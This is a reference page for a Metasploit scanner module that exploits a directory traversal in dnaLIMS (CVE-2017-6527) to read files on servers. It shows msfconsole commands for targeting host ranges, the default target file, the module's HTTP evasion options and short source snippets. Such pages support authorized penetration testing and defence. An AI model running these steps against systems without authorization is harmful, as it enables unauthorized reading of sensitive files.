DnaLIMS Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/dnalims_file_retrieve metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: DnaLIMS Directory Traversal
Module: auxiliary/scanner/http/dnalims_file_retrieve
Source code: modules/auxiliary/scanner/http/dnalims_file_retrieve.rb
Disclosure date: 2017-03-08
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-6527

This module exploits a directory traversal vulnerability found in dnaLIMS. Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible to read a file outside the www directory.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/dnalims_file_retrieve
msf auxiliary(dnalims_file_retrieve) > show options
    ... show and set options ...
msf auxiliary(dnalims_file_retrieve) > set RHOSTS ip-range
msf auxiliary(dnalims_file_retrieve) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(dnalims_file_retrieve) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(dnalims_file_retrieve) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(dnalims_file_retrieve) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/dnalims_file_retrieve auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/dnalims_file_retrieve

msf6 auxiliary(scanner/http/dnalims_file_retrieve) > show info

       Name: DnaLIMS Directory Traversal
     Module: auxiliary/scanner/http/dnalims_file_retrieve
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-08

Provided by:
  h00die <[email protected]>
  flakey_biscuit <[email protected]>

Check supported:
  No

Basic options:
  Name       Current Setting         Required  Description
  ----       ---------------         --------  -----------
  DEPTH      4                       yes       The traversal depth
  FILE       /home/dna/spool/.pfile  yes       The path to the file to view
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                      yes       The target port (TCP)
  SSL        false                   no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /cgi-bin/dna/           yes       The base path to dnaLIMS
  THREADS    1                       yes       The number of concurrent threads (max one per host)
  VHOST                              no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability found in 
  dnaLIMS. Due to the way the viewAppletFsa.cgi script handles the 
  'secID' parameter, it is possible to read a file outside the www 
  directory.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-6527
  https://www.kb.cert.org/vuls/id/929263
  https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/

Module Options


This is a complete list of options available in the scanner/http/dnalims_file_retrieve auxiliary module:

msf6 auxiliary(scanner/http/dnalims_file_retrieve) > show options

Module options (auxiliary/scanner/http/dnalims_file_retrieve):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   DEPTH      4                       yes       The traversal depth
   FILE       /home/dna/spool/.pfile  yes       The path to the file to view
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                      yes       The target port (TCP)
   SSL        false                   no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cgi-bin/dna/           yes       The base path to dnaLIMS
   THREADS    1                       yes       The number of concurrent threads (max one per host)
   VHOST                              no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/dnalims_file_retrieve auxiliary module:

msf6 auxiliary(scanner/http/dnalims_file_retrieve) > show advanced

Module advanced options (auxiliary/scanner/http/dnalims_file_retrieve):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/dnalims_file_retrieve module can do:

msf6 auxiliary(scanner/http/dnalims_file_retrieve) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/dnalims_file_retrieve auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/dnalims_file_retrieve) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No response from server.


Here is a relevant code snippet related to the "No response from server." error message:

53:	                    'hidenav' => '1'
54:	      }
55:	    })
56:	
57:	    if not res
58:	      print_error("No response from server.")
59:	      return
60:	    end
61:	
62:	    if res.code != 200
63:	      print_error("Server returned a non-200 response (body will not be saved):")

Server returned a non-200 response (body will not be saved)


Here is a relevant code snippet related to the "Server returned a non-200 response (body will not be saved)" error message:

58:	      print_error("No response from server.")
59:	      return
60:	    end
61:	
62:	    if res.code != 200
63:	      print_error("Server returned a non-200 response (body will not be saved):")
64:	      print_line(res.to_s)
65:	      return
66:	    end
67:	
68:	    vprint_good(res.body)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.